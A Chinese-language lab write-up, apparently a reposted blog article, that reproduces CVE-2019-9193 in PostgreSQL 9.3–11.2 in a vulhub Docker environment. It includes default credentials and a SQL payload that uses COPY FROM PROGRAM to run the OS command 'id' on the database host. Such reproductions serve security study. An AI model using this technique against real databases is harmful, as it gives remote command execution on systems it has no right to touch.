简介
PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。
影响版本
9.3-11.2漏洞概述
PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。
环境搭建
进入目录并启动环境
cd vulhub-master/postgres/CVE-2019-9193/docker-compose up -d
环境启动后,将开启Postgres默认的5432端口,默认账号密码为postgres/postgres。
漏洞复现
首先连接到postgres中
psql --host 192.168.204.136 --username postgres执行如下语句,FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中:
DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'id';SELECT * FROM cmd_exec;
成功执行命令
修复建议
升级到安全版本
本文始发于微信公众号(锋刃科技):PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论